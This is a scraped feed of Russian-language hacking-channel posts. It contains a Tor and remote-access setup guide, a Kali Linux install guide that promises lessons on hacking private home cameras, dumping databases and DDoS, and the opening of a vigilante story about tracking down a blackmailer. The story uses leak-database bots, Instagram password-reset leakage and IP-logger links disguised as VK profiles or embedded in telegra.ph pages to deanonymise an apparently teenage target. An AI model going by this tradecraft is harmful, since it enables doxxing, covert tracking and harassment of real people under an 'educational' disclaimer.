  &lt;blockquote id=&quot;cRNv&quot; data-align=&quot;center&quot;&gt;Немного описания: &amp;quot;&lt;code&gt;git clone&lt;/code&gt;&amp;quot; скачала утилиту через GitHub, команда &lt;br /&gt;&amp;quot;&lt;code&gt;cd toriptables2&lt;/code&gt;&amp;quot; зашла в папку со скачанной утилитой. Далее идёт шаг перемещения, с папки в которой сейчас находимся (в нашем случае &amp;quot;&lt;code&gt;toriptables2&lt;/code&gt;&amp;quot;) перемещается файл &amp;quot;&lt;code&gt;toriptables2.py&lt;/code&gt;&amp;quot; в &amp;quot;корневую&amp;quot; директорию всех установленных утилит, чтобы мы могли использовать запуск скрипта с любого места. Команда &amp;quot;&lt;code&gt;cd&lt;/code&gt;&amp;quot; без какой-либо папки перенесёт нас в &amp;quot;базовое местоположение&amp;quot;, в котором мы по умолчанию находимся после запуска терминала. Далее идёт запуск скрипта, который покажет нам меню с описанием функционала. (из-за атрибута -h, = -help)&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;zHop&quot; data-align=&quot;center&quot;&gt;Итак, по итогу мы должны увидеть такое меню с описанием команд:&lt;/p&gt;
  &lt;figure id=&quot;kXbp&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bf/8e/bf8e7400-ec72-459a-8d51-a5ace5f62a41.png&quot; width=&quot;798&quot; /&gt;
    &lt;figcaption&gt;toriptables2 - описание команд&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;YlUM&quot; data-align=&quot;center&quot;&gt;Как вы уже поняли, если сменить атрибут нашей команды с &amp;quot;-h&amp;quot; на &amp;quot;-l&amp;quot;, оно подключит нас к сети TOR. Давайте это и сделаем. Я ввожу такую команду:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RdPx&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;toriptables2.py -l&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;Zn5I&quot; data-align=&quot;center&quot;&gt; После этого нужно ввести пароль, потому что для действия нужны системные права. По итогу подключение удалось, результат можно узреть на скриншоте:&lt;/p&gt;
  &lt;blockquote id=&quot;Ryky&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Совет&lt;/strong&gt;: &amp;quot;KillSwitch&amp;quot; — это функция для блокировки трафика, если VPN &amp;quot;слетел&amp;quot;. Если у вас есть возможность включить это — даже не задумывайтесь, делайте.&lt;/blockquote&gt;
  &lt;figure id=&quot;5kdP&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/fb/ef/fbef8af5-76eb-4974-adf8-85858f9d45f0.png&quot; width=&quot;816&quot; /&gt;
    &lt;figcaption&gt;успешное подключение&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;83sB&quot; data-align=&quot;center&quot;&gt;Клиент для RDP/SSH&lt;/h2&gt;
  &lt;p id=&quot;xP7a&quot; data-align=&quot;center&quot;&gt;По умолчанию нам не предоставили удобный клиент для подключения по rdp/ssh, поэтому, установим его самостоятельно. Я уже несколько лет использую Remmina и ни разу не столкнулся с проблемой. Имеются очень гибкие настройки под наши &amp;quot;тёмные&amp;quot; дела, описать каждый пункт = потратить пол дня. Для установки нам потребуется написать всего лишь одну команду:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;XGMW&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;sudo apt install remmina&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;8vev&quot; data-align=&quot;center&quot;&gt;После установки инструмент можно будет найти в списке утилит. Если вы работаете через сеть TOR, можно максимально оптимизировать скорость соединения: от смены качества изображения до отключения ненужных функций.&lt;/p&gt;
  &lt;blockquote id=&quot;7fFT&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Заметка&lt;/strong&gt;: SSH используют для удалённого доступа к серверу, по умолчанию работает на порте &amp;quot;22&amp;quot;. Он не имеет графического интерфейса, (без дополнений) чаще используется на серверах Linux, хоть и пригоден для любой другой ОС.&lt;/blockquote&gt;
  &lt;blockquote id=&quot;cemc&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Заметка #2&lt;/strong&gt;: RDP/Дедик работает на порте &amp;quot;3389&amp;quot;. Этот протокол используют только для подключения к серверам на Windows. Имеет графический интерфейс.&lt;/blockquote&gt;
  &lt;figure id=&quot;5KUb&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/31/30/3130fb98-5647-4082-bf6c-134bb2c0c883.png&quot; width=&quot;778&quot; /&gt;
    &lt;figcaption&gt;Remmina: команда установки &amp;amp; результат&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;M4kj&quot; data-align=&quot;center&quot;&gt;FileZilla — FTP Клиент&lt;/h2&gt;
  &lt;p id=&quot;WE1U&quot; data-align=&quot;center&quot;&gt;Когда мы узнали данные от *&lt;code&gt;нашего&lt;/code&gt;* сервера, нам нужно использовать какую-то утилиту для взаимодействия с ним. Сейчас их появилось просто уйма, но мой выбор падает на FileZilla. Это самый легкий и понятный клиент для подключения к сервакам по протоколу FTP. Как мы заметили, устанавливать приложения в Linux можно в одну строчку, это даже удобнее, чем на Windows. &lt;br /&gt;Введите эту команду в терминал для установки:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;utP8&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;sudo apt install filezilla&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RC7U&quot; data-align=&quot;center&quot;&gt;Как всегда, несколько секунд ожидания и мы можем запускать утилиту.&lt;/p&gt;
  &lt;blockquote id=&quot;9LbA&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Заметка&lt;/strong&gt;: протокол FTP работает на порту &amp;quot;21&amp;quot; и используется для передачи файлов / доступа к удалённым хостам. SSH считают безопасней для этих целей.&lt;/blockquote&gt;
  &lt;figure id=&quot;reV5&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ae/9e/ae9e913d-ae2f-4fe3-8d54-d615dcffc174.png&quot; width=&quot;754&quot; /&gt;
    &lt;figcaption&gt;интерфейс FileZilla&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;MiiK&quot; data-align=&quot;center&quot;&gt;Итоги&lt;/h2&gt;
  &lt;p id=&quot;zQR8&quot; data-align=&quot;center&quot;&gt;Мы установили базу, от которой в дальнейшем оттолкнёмся. Я думаю, это был действительно полезный урок, ведь мы освоили много новых команд. У меня стоит цель объяснить вам материал на понятном языке, порой, это сложно. Надеюсь, все было понятно, но если нет — вы всегда сможете задать вопрос в нашем ламповом чате: &lt;a href=&quot;https://t.me/hack2day_chat&quot; target=&quot;_blank&quot;&gt;https://t.me/hack2day_chat&lt;/a&gt;. Всем здоровья и мирного неба!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</content></entry><entry><id>hack2day:K_SYZAKUghA</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/K_SYZAKUghA?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>Установка Kali Linux на VM</title><published>2023-04-04T19:12:02.954Z</published><updated>2023-04-04T19:18:22.180Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/8e/6e/8e6e4f9a-57c3-4ae3-aa16-16cbfbb47385.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/40/9c/409ca153-ec17-4d2c-9d95-380c4aa58122.png&quot;&gt;Приветствую подписчиков нашего канала. Мы с вами прошли много теории, изучили основную базу и готовы переходить на следующий этап — Linux. Это по настоящему мощнейший инструмент и я предполагаю, вам будет интересно попробовать поработать с ним. Немного о том что мы будем делать в дальнейшем: &quot;пентест&quot; камер частных домов, &quot;пентест&quot; сайта с дальнейшей выгрузкой базы данных (те самые дампы) и их расшифровка, попробуем получить доступ к серверам крупнейших команд на форумах, проверим сервера на стойкость атаками DDOS. И это только начало! Я буду пытаться максимально просто выражать информацию для каждого новичка и предполагаю, мы образуем своеобразный круг людей с одинаковыми интересами в котором будем обмениваться информацией или вовсе...</summary><content type="html">
  &lt;p id=&quot;hii3&quot; data-align=&quot;center&quot;&gt;Приветствую &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;подписчиков нашего канала&lt;/a&gt;. Мы с вами прошли много теории, изучили основную базу и готовы переходить на следующий этап — Linux. Это по настоящему мощнейший инструмент и я предполагаю, вам будет интересно попробовать поработать с ним. Немного о том что мы будем делать в дальнейшем: &amp;quot;пентест&amp;quot; камер частных домов, &amp;quot;пентест&amp;quot; сайта с дальнейшей выгрузкой базы данных (те самые дампы) и их расшифровка, попробуем получить доступ к серверам крупнейших команд на форумах, проверим сервера на стойкость атаками DDOS. И это только начало! Я буду пытаться максимально просто выражать информацию для каждого новичка и предполагаю, мы образуем своеобразный круг людей с одинаковыми интересами в котором будем обмениваться информацией или вовсе объединимся в &amp;quot;белую группировку&amp;quot;.&lt;br /&gt; Приятного ознакомления, если ты ещё не с нами, &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;подписывайся&lt;/a&gt;!&lt;/p&gt;
  &lt;p id=&quot;sX5t&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;4wqZ&quot; data-align=&quot;center&quot;&gt;Что такое Kali Linux и зачем он? &lt;/h2&gt;
  &lt;p id=&quot;G76l&quot; data-align=&quot;center&quot;&gt;Расскажу по-простому: Linux — операционная система, на которой базируются разные кастомные оболочки. Вы наверняка видели &amp;quot;сборки&amp;quot; Windows у которых был упор на оптимизацию, приватность, различные дополнения. Так вот, в основном они созданы каким-либо сообществом. В Linux тоже имеются &amp;quot;сообщества&amp;quot;, которые делают дистрибутивы под разные цели. Я выбрал именно Kali из-за разнообразия утилит. Система подходит под большинство целей, которые нас интересуют + максимально проста в восприятии новичка. Проще говоря, это оболочка с уже готовым арсеналом инструментов, нам не потребуется создавать велосипед. Имеет открытый код, полностью бесплатна.&lt;/p&gt;
  &lt;figure id=&quot;jtku&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/40/9c/409ca153-ec17-4d2c-9d95-380c4aa58122.png&quot; width=&quot;685&quot; /&gt;
    &lt;figcaption&gt;Интерфейс Kali Linux (GNOME Shell)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;m8De&quot; data-align=&quot;center&quot;&gt;Куда его ставить?&lt;/h2&gt;
  &lt;p id=&quot;ED0X&quot; data-align=&quot;center&quot;&gt;Скачайте и установите &lt;a href=&quot;https://www.virtualbox.org/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;VirtualBox&lt;/strong&gt;&lt;/a&gt;. Я не советую накатывать новичку Linux в качестве основной системы, вы просто сойдёте с ума. На виртуальной машине можно запускать его в любое время в качестве второстепенной системы. Альтернативный вариант: установка на съемный накопитель. (флешка) Мы рассмотрим этот метод в другой раз и накатаем систему, которую будет легко &lt;s&gt;&lt;em&gt;смыть в туалете при обыске&lt;/em&gt;&lt;/s&gt; использовать в любом месте, где есть доступ к ПК.&lt;/p&gt;
  &lt;figure id=&quot;5Vfx&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/16/d2/16d2e399-5349-4f9d-afcf-e1b8fdaa2525.png&quot; width=&quot;671&quot; /&gt;
    &lt;figcaption&gt;Интерфейс VirtualBox&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;FYBy&quot; data-align=&quot;center&quot;&gt;Установочный мануал&lt;/h2&gt;
  &lt;p id=&quot;vvJd&quot; data-align=&quot;center&quot;&gt;Мы определились что будем использовать систему на VM (виртуальной машине), осталось только скачать и установить сам Kali. Для этого перейдите &lt;a href=&quot;https://www.kali.org/get-kali/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;на страницу загрузки&lt;/strong&gt; &lt;/a&gt;и выберите &amp;quot;&lt;code&gt;Virtual Machine&lt;/code&gt;&amp;quot; --&amp;gt; &amp;quot;&lt;code&gt;VirtualBox64&lt;/code&gt;&amp;quot;. Есть несколько вариаций загрузки: Torrent, прямая загрузка с серверов. Я выберу первый вариант. Файл занимает &lt;strong&gt;&lt;em&gt;2.7&lt;/em&gt;GB, но нам потребуется выделить больше места.&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;jzbv&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c7/07/c7074ea8-9dc2-447f-8330-d78d2e703f18.png&quot; width=&quot;742&quot; /&gt;
    &lt;figcaption&gt;Загрузочная страница Kali Linux&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;L29E&quot; data-align=&quot;center&quot;&gt;После скачки у нас будет архив, который содержит в себе два файла. Нам нужно распаковать все содержимое в любую удобную для вас папку. (её нельзя будет удалять в дальнейшем) Запустите файл с расширением &amp;quot;&lt;code&gt;.vbox&lt;/code&gt;&amp;quot; и вы увидите, как в VirtualBox появится новая система под названием &amp;quot;&lt;code&gt;kali-linux-2023..&lt;/code&gt;&amp;quot;, запустите её кнопкой &amp;quot;&lt;code&gt;Start&lt;/code&gt;&amp;quot;. Установка произойдёт автоматически, буквально минута времени и все готово к использованию. Если вам показалось что есть небольшие пролагивания, можно выделить больше ресурсов в настройках VirtualBox. Я выделил &lt;strong&gt;4&lt;em&gt;GB&lt;/em&gt;&lt;/strong&gt; ОЗУ, &lt;strong&gt;128&lt;em&gt;MB&lt;/em&gt;&lt;/strong&gt; Видеопамяти, &lt;strong&gt;3 &lt;em&gt;CPU&lt;/em&gt;&lt;/strong&gt;.Хоть и потребление в среднем не превышает и 50% того, что я предоставил. Ну да ладно, пусть будет.&lt;/p&gt;
  &lt;p id=&quot;bar8&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;rwH7&quot; data-align=&quot;center&quot;&gt;Первый запуск&lt;/h2&gt;
  &lt;p id=&quot;vAw4&quot; data-align=&quot;center&quot;&gt;При первоначальном запуске нас потребует ввести аутентификационные данные.&lt;br /&gt;Стандартный login/password: &lt;code&gt;kali:kali&lt;/code&gt;. Мы сможем изменить его в дальнейшем. &lt;/p&gt;
  &lt;figure id=&quot;cBOV&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c6/00/c600c9aa-d7b6-4810-9aaf-298018ee0a66.png&quot; width=&quot;703&quot; /&gt;
    &lt;figcaption&gt;Авторизация Kali Linux&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;VELa&quot; data-align=&quot;center&quot;&gt;Давайте произведём одно из важных действий: обновление пакетов. Откройте терминал и пропишите эту команду: &lt;code&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade&lt;/code&gt;&lt;br /&gt;Таким образом мы проверим наличие обновлений, если они вышли — установим.&lt;/p&gt;
  &lt;blockquote id=&quot;Mrtd&quot; data-align=&quot;center&quot;&gt;Терминал находится в левом верхнем углу и выглядит как чёрный квадрат.&lt;br /&gt;(см. скриншот, выделено стрелочкой)&lt;/blockquote&gt;
  &lt;blockquote id=&quot;tcnl&quot; data-align=&quot;center&quot;&gt;Чтобы вставить/скопировать текст в терминале, используйте: CTRL + Shift + V/C.&lt;/blockquote&gt;
  &lt;blockquote id=&quot;8vYH&quot; data-align=&quot;center&quot;&gt;Двойной амперсанд (&amp;amp;&amp;amp;) используется для запуска нескольких задач в одной строке. В данном случае, мы обратились к системе и сказали ей: слушай, сначала посмотри что у меня вообще установлено, проверь, есть ли на него новые обновления. Если что-то нашлось — обнови самостоятельно.&lt;/blockquote&gt;
  &lt;figure id=&quot;iwi1&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/24/bd/24bd7da9-eeec-4a46-b1b6-5d75e71a87f5.png&quot; width=&quot;819&quot; /&gt;
    &lt;figcaption&gt;Обновление пакетов&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ELop&quot; data-align=&quot;center&quot;&gt;Если у вас запросит пароль для этого действия, введите &amp;quot;&lt;code&gt;kali&lt;/code&gt;&amp;quot;. Процесс долгий, во время обновлений можно порыться в менюшке и ознакомиться с утилитами. Если запрашивают ваше соглашение на установку, вводите в терминал букву &amp;quot;&lt;code&gt;y&lt;/code&gt;&amp;quot;.&lt;/p&gt;
  &lt;blockquote id=&quot;f9Ez&quot; data-align=&quot;center&quot;&gt;Буква &amp;quot;y&amp;quot; воспринимается за слово &amp;quot;yes&amp;quot;, его антоним — &amp;quot;n&amp;quot;, который читается системой как &amp;quot;no&amp;quot; и обозначает отказ от какого-то действия.&lt;/blockquote&gt;
  &lt;p id=&quot;fJ0l&quot; data-align=&quot;center&quot;&gt;После обновления можно выдохнуть, ведь первый шаг сделан. Я не хочу учить вас в виде книги с кучей ненужных терминов, которую нужно заучить. Мы будем получать опыт на практике, постепенно, но уверенно. На данный момент наша система готова к последующим манипуляциям, которые мы будем совершать в последующих статьях. Благодарю за прочтение, всем здоровья и мирного неба!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</content></entry><entry><id>hack2day:uY5H-6AmFZh</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/uY5H-6AmFZh?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>Как мы нашли и наказали шантажиста</title><published>2023-03-28T21:27:01.982Z</published><updated>2023-03-28T21:36:44.093Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/dd/ac/ddacf0cf-1839-48d8-a509-994a3f409d2b.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/46/56/4656d667-890b-4dcd-a9c9-1774d0e65251.png&quot;&gt;ДИСКЛЕЙМЕР</summary><content type="html">
  &lt;p id=&quot;KiXl&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;ДИСКЛЕЙМЕР&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;o2F7&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;Статья несёт образовательный характер. Мы не поощряем никакую нелегальную деятельность. Все персонажи вымышлены, совпадения с реальностью случайны.&lt;br /&gt;Статья написана и опубликована используя искусственный интеллект!&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;NRBs&quot; data-align=&quot;center&quot;&gt;Приветствую! Как часто вы сталкивались с мошенниками, вымогателями и прочей нечистью? Давайте будем честны, полиция не особо интересуется подобными личностями, именно это и движет их совершать преступления. Уровень жизни в СНГ странах желает лучшего, легальные работы не оправдывают несколько потраченных лет обучения в университете. Многие личности переходят &amp;quot;границы&amp;quot; закона, пытаясь получить много за краткий срок. Но не в нашу смену! Сегодня мы найдём вымогателя и он заплатит цену больше, чем требовал. Приятного чтения! &lt;/p&gt;
  &lt;p id=&quot;pNVN&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;bRge&quot; data-align=&quot;center&quot;&gt;С чего все началось&lt;/h2&gt;
  &lt;p id=&quot;gr2J&quot; data-align=&quot;center&quot;&gt;Несколько дней назад мне пришло сообщение от некого пользователя, который был известен своими &amp;quot;деанонами&amp;quot;. Проще говоря, мне скинули какие-то данные и вымогали 2 ETH за &amp;quot;свободу&amp;quot;, в случае отказа эти данные должны были посетить отделение полиции. Так как я не замешан ни в какой нелегальной деятельности, мне было абсолютно плевать, тем более информация не имела ничего общего со мной. Спустя несколько дней я увидел тему на форуме, в которой люди обсуждали эту личность. Как оказалось, написал он не только мне и некоторые пользователи действительно заплатили ему за &amp;quot;свободу&amp;quot; во избежания неприятностей. С того момента у меня стояла цель: найти и наказать вредителя, чтобы больше никто не пострадал от его действий. И у меня вышло!&lt;/p&gt;
  &lt;figure id=&quot;IeDG&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/46/56/4656d667-890b-4dcd-a9c9-1774d0e65251.png&quot; width=&quot;671&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;пример его угроз&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;zMT3&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;q3Yd&quot; data-align=&quot;center&quot;&gt;Базовый сбор информации&lt;/h2&gt;
  &lt;p id=&quot;Z2CE&quot; data-align=&quot;center&quot;&gt;Все, что у нас есть на эту особь: никнейм в телеграм, приблизительный возраст по стилю письма. (около 14-ти лет) Из этих данных мы должны подарить вредителю инфаркт, не густо, правда? Так как мы имеем никнейм, можно попробовать поискать его аккаунты в других соц. сетях. Для этого воспользуемся сервисом &lt;a href=&quot;https://t.me/maigret_osint_bot&quot; target=&quot;_blank&quot;&gt;@maigret_osint_bot&lt;/a&gt;, который ищет совпадения на 3000 сайтах. &lt;br /&gt;Такой результат мне удалось получить используя бота:&lt;/p&gt;
  &lt;figure id=&quot;uI0w&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/0b/77/0b77904a-b736-448c-adfa-39e6fdf3aae4.png&quot; width=&quot;500&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;информация с maigret&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XMZ0&quot; data-align=&quot;center&quot;&gt;К сожалению, вся эта информация не имела ничего общего с нашим вредителем, в основном все эти личности — иностранцы, которые использовали такой же никнейм. Поэтому, перейдём к следующему шагу: Глаз Бога. Это бот, который хранит информацию с утечек и умеет найти практически любого человека. Перейти: &lt;a href=&quot;https://eyeofgod.pro/&quot; target=&quot;_blank&quot;&gt;https://eyeofgod.pro/&lt;/a&gt;. Я смог обнаружить прошлый никнейм, который существенно поможет нам в дальнейшем поиске.&lt;/p&gt;
  &lt;figure id=&quot;oyhf&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e7/29/e7295a44-2fb7-484b-be98-40ef600caa7e.png&quot; width=&quot;314&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;информация с Глаза Бога&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ulXZ&quot; data-align=&quot;center&quot;&gt;Вбив прошлый никнейм в поисковики (DuckDuckGo, Yandex, Google) я смог найти потенциальный аккаунт в Instagram. Скорее всего, он использовался для поиска информации / угроз жертвам. Так как аккаунт уже удалён, я покажу образец:&lt;/p&gt;
  &lt;figure id=&quot;ZoT4&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4f/a8/4fa89b3e-6e88-445b-a21c-e3e68c4db460.png&quot; width=&quot;710&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;образец его профиля Instagram&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;W7Q2&quot; data-align=&quot;center&quot;&gt;Это весомая находка, ведь мы сможем узнать часть почты / номера телефона. Для этого нам нужно перейти на главную страницу &lt;a href=&quot;https://www.instagram.com/accounts/password/reset/&quot; target=&quot;_blank&quot;&gt;Instagram &lt;/a&gt;и нажать &amp;quot;Забыл пароль&amp;quot;. После ввода юзернейма нас уведомляют, что SMS с дальнейшими действиями отправлено на номер &amp;quot;&lt;code&gt;+7 *** *** **38&lt;/code&gt;&amp;quot;. Начало положено! Теперь нужно включать навыки соц. инженера и переходить к общению.&lt;/p&gt;
  &lt;figure id=&quot;ctJu&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/42/70/4270f58a-95b2-4199-a76f-dfe8dc91deaa.png&quot; width=&quot;717&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;неполный номер телефона&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;D41p&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;9L65&quot; data-align=&quot;center&quot;&gt;Попытка получить IP #1&lt;/h2&gt;
  &lt;p id=&quot;sVzb&quot; data-align=&quot;center&quot;&gt;Айпи нам нужен для того, чтобы &lt;s&gt;шантажировать походом в полицию&lt;/s&gt; сверить информацию. Так как мы не прощупали навыки нашего вредителя, зайдём &amp;quot;с козырей&amp;quot; — скинем логгер напрямую. Логгер используют для того, чтобы узнать информацию об устройстве по ссылке. Речь идёт о примерном местоположении, модели телефона, интернет провайдере, браузере и прочих деталях.&lt;br /&gt;Я создал его на сайте iplogger.org и замаскировал под профиль VK,&lt;br /&gt; используя стандартную гиперссылку в Telegram. (CTRL + K)&lt;/p&gt;
  &lt;figure id=&quot;Atoq&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/94/d4/94d456e7-d7da-4468-81f6-037bf2f4dfc7.png&quot; width=&quot;314&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;видоизменяем ссылку в tg&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;9e1p&quot; data-align=&quot;center&quot;&gt;К сожалению, это не прокатило. При нажатии на ссылку выходило предупреждение о том, что она ведёт не туда, куда написано. Думаю, именно это спугнуло шантажиста. Поэтому, замаскируем её в доверенном сайте!&lt;/p&gt;
  &lt;figure id=&quot;B5Pn&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/04/40/0440cbb0-4b2d-436c-adda-3f766e3ba5bd.png&quot; width=&quot;574&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;Первая попытка узнать IP, которая была неудачной&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;8tFm&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;1BBV&quot; data-align=&quot;center&quot;&gt;Попытка получить IP #2&lt;/h2&gt;
  &lt;p id=&quot;WVas&quot; data-align=&quot;center&quot;&gt;В этот раз мы внедрим наш логгер прямо в сайт, чтобы не возникало никаких сомнений. По сути, человек переходит на условный &amp;quot;telegra.ph&amp;quot;, но внутри сайта подгружается картинка из нашего источника. Прямо сейчас я мог бы &amp;quot;подгрузить&amp;quot; скриншот из этой статьи используя картинку-логгер и узнать информацию о вас. Выбор &amp;quot;telegra.ph&amp;quot; не случаен, ведь при отправке ссылки с этого сайта Telegram создает кнопку &amp;quot;Посмотреть&amp;quot;, по сути даже не нужно ничего открывать в браузере, все происходит в один клик. Пример можно увидеть ниже.&lt;/p&gt;
  &lt;figure id=&quot;JnbV&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/29/5e/295e7570-410b-4e4c-a2d3-ea41d4f3e22e.png&quot; width=&quot;306&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;пример кнопки &amp;quot;Посмотреть&amp;quot;&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
